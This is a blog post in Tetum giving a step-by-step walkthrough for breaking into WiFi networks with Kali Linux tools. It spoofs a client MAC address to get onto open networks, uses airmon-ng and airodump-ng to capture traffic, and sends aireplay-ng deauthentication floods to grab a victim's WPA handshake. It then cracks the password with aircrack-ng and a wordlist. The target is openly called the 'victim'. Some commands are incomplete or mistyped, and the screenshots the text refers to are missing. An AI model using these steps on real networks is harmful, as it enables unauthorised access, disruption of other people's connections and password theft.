Sistema Operasaun ho Tools saida mak ita atu uja bele ajuda ita hodi halo actividade hacking wifi ( KaliLinux ho Backtrack 5r )
Opn
#ifconfig = mak ita hare ita nia wirelless adapter
iha buat tolu mak sei mosu
lo = localhost 127.0.0.1
eth0 = mak ita nia kartu jaringan
wlan0 = mak wireless adaptor
#ifconfig wlan0
#ifconfig wlan0 down
#ifconfig wlan0 hw ether = troka mac addres
#ifocnfig wlan0 up
#ifconfig wlan0 = sai hanesan fali sira nia mac address
Hack konaba opn nian:
# ifconfig
# airmon-ng start wlan0
# airodump-ng mon0 = hamate karut jaringan
# airodump-ng -c 11 --bssid mon0
# ifconfig wlan0 down
# ifconfig wlan0 hw ether cleint mac address
# ifconfig wlan0 up = hamoris kartu jaringan
# ifconfig para chek mac.
WPA
# airmon-ng
# airmon-ng start wlan0
# airodump-ng mon0
# airodump-ng --bssid -c -w target mon0
# aireplay-ng --deauth 10 -a 00:11:22:33:44:55 –c 21:a2:d3:f1:aa:ee mon0
#aireplay-ng -1 0 -a 00:11:22:33:44:55 mon0
#aireplay-ng -0 0 -a 00:11:22:33:44:55 mon0
# aircrack-ng koko-01.cap -w ./desktop/simplewordlist
Etapa primeru ketik lai
Loke terminal
airmon-ng start wlan0 (enter)
depois ketik tan;
airodump-ng wlan0 (enter)
ne'e sei mosu hanesa dezenu tuir mai ne'e;
sei mosu hanesa dezenu leten ne'e, signifika katak hetan ona target ne'ebe mak ita atu crack. Depois hanehan butaun control + c para atu hapara scanning.
Depois tuir mai ketik tan;
airodump-ng -c 2 --write Hacker -- bssid C4:A3:66:B1:50:AE wlan0 (enter)
hanesan dezenu ida ne'e
iha dezenu leten hau hakarak
esplika katak --bssid C4:A3:66:B1:50:AE ne'e husi bssid ho essid naran victima nian. Depois -c 2 ne husi nia channel victima nian,
bele hare iha dezenu leten ne'e, ne'ebe mak hakerek CH iha leten. Depois --write
Hacker ne'e folder ne'ebe mak ita cria tiha ona. Ita bele tau naran
saida deit.
iha dezenu leten ne'e ita tenki
hein to Klienti nia mac address mosu. Klienti nia mac address mak iha STATION nia okos ne'e.depois ketik tan;
ou bele hare tuir hanesa iha dezenu ida ne'e;
hanesa dezenu ida ne'e;
ne'ebe mak hanesa ho ida uluk ne'e; e ketik tan koding ida ne'e;
aircrack-ng -w Hacker.txt -b C4:A3:66:B1:50:AE Hacker-01.cap (enter)
Depois imi enter deit, no ikus liu mak nia sei buka password sira ne'ebe mak iha. Se nia hetan password sira, nia se hatudu hatudu hanesa dezenu ida ne'e;
Obrigado ba ita boot sira hotu nebe mak iha laran luak vizita ona hau nia Blog, espera katak blog ida nee bele fo vantagen ba ita hotu.
Labele haluhan Klick Subscribe iha leten.












0 komentar:
Post a Comment